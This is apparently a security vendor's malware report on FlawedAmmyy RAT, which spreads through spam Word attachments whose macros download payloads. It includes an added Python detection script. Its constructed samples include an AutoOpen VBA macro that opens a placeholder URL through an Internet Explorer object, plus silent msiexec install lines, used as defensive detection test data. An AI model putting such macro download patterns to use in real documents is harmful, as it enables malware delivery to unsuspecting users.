A Closer Look at the FlawedAmmyy’s New Attack Style

Clop ransomware first appeared in full early this year, mainly targeting Korean organizations and corporations. Beyond being targeted ransomware, Clop attacks use a hacking tool called FlawedAmmyy RAT (Remote Access Trojan). Although Clop ransomware has boomed since the end of May, the spread of FlawedAmmyy RAT has only recently surged, and it has been targeting local companies in particular, as the following example shows.

Distributed in early morning disguised as a work-related email
In August, FlawedAmmyy was distributed to local organizations and corporations via spam email disguised as work-related mail. At the same time, similar spam emails were sent to users worldwide.

The spam email targeting local companies posed as a ‘Scan file’ and carried a Word attachment named ‘Scan_(random number).doc’. When the user opens the attachment, the document prompts the user to enable macros.

The macro code included in these Word files fetches its payload in one of two ways. The first uses an Internet Explorer (IE) object to access a specific URL and download the file, as shown in Figure 1.

Figure 1. Process tree of document after being executed using IE object

The second downloads an MSI file from an external server using type and form object information, as shown in Figure 2.

Figure 2. Method of downloading the MSI file
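The two delivery methods above each leave a recognizable trace: the document's Office process spawns either an Internet Explorer child (Figure 1) or a Windows Installer (msiexec.exe) child, and the macro source itself contains the corresponding COM object or MSI references. The following is an added detection example, not code from the original post or from AhnLab; the process events, VBA fragment, file names and URLs are constructed placeholders, and the assumption that the MSI method surfaces as an msiexec.exe child of the Office process is ours, not something the post states.

```python
"""
Added example (not part of the original ASEC post): defender-side detection
logic for the two macro download methods described above. All sample data
is constructed for illustration; the URLs, file names and process details
are placeholders, not indicators taken from the post.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office applications whose child processes are rarely a browser or an installer
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Child processes matching the two methods: IE object (method 1) and MSI install
# (method 2; mapping the MSI method to an msiexec.exe child is our assumption)
SUSPICIOUS_CHILDREN = {"iexplore.exe": "ie_object_download", "msiexec.exe": "msi_install"}

# Static indicators in VBA source that correspond to the same two methods
VBA_INDICATORS = {
    "ie_object_download": re.compile(
        r'CreateObject\s*\(\s*"InternetExplorer\.Application"\s*\)', re.I),
    "msi_install": re.compile(
        r"WindowsInstaller\.Installer|msiexec(\.exe)?\s+/i|\.msi\b", re.I),
}


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_process_event(ev: ProcEvent) -> Optional[str]:
    """Return a detection label if an Office app spawned an IE or msiexec child."""
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return None
    return SUSPICIOUS_CHILDREN.get(basename(ev.image))


def scan_vba(source: str) -> List[str]:
    """Return labels of the download methods whose indicators appear in VBA text."""
    return [label for label, pat in VBA_INDICATORS.items() if pat.search(source)]


# Constructed process-creation events: two malicious patterns and one benign install
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" http://example.invalid/get'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi /q"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\user\Downloads\legit-app.msi"),
]

# Constructed VBA fragment (placeholder URL) resembling method 1's IE object use
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim ie As Object
    Set ie = CreateObject("InternetExplorer.Application")
    ie.Navigate "http://example.invalid/scan"
End Sub
'''


def run_detections() -> Tuple[List[Tuple[str, Optional[str]]], List[str]]:
    """Apply both checks to the constructed samples and return their results."""
    hits = [(basename(e.image), classify_process_event(e)) for e in SAMPLE_EVENTS]
    return hits, scan_vba(SAMPLE_VBA)


if __name__ == "__main__":
    process_hits, vba_hits = run_detections()
    for child, label in process_hits:
        print(f"{child}: {label or 'no detection'}")
    print("VBA indicators:", vba_hits)
```

The process-tree rule is the more robust of the two, since it does not depend on how the macro is obfuscated; the VBA scan is a cheap first pass for mail-gateway triage. Both are deliberately narrow, so tune the parent and child sets to what is normal in your own environment before alerting on them.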

FlawedAmmyy RAT primarily installs Clop ransomware and other Remote Access Trojans or backdoors on infected systems. Some of this year's Clop ransomware attacks have attempted to spread malware and steal system information through corporate internal systems. Corporate security officers therefore need to stay alert, as FlawedAmmyy keeps evolving while being distributed globally.
Meanwhile, AhnLab's security solution detects the malicious document files attached to the spam mails that distribute FlawedAmmyy, and the executable files they download, under the following aliases. V3, AhnLab's anti-malware product, also blocks these malicious files from connecting to the C&C server; this requires V3's Active Defense setting to be enabled.
<Aliases identified by AhnLab>

– VBA/AMMacro.S10
– VBA/AMMacro.S11
– Win-Trojan/Suspig9.Exp

Categories: Malware Information
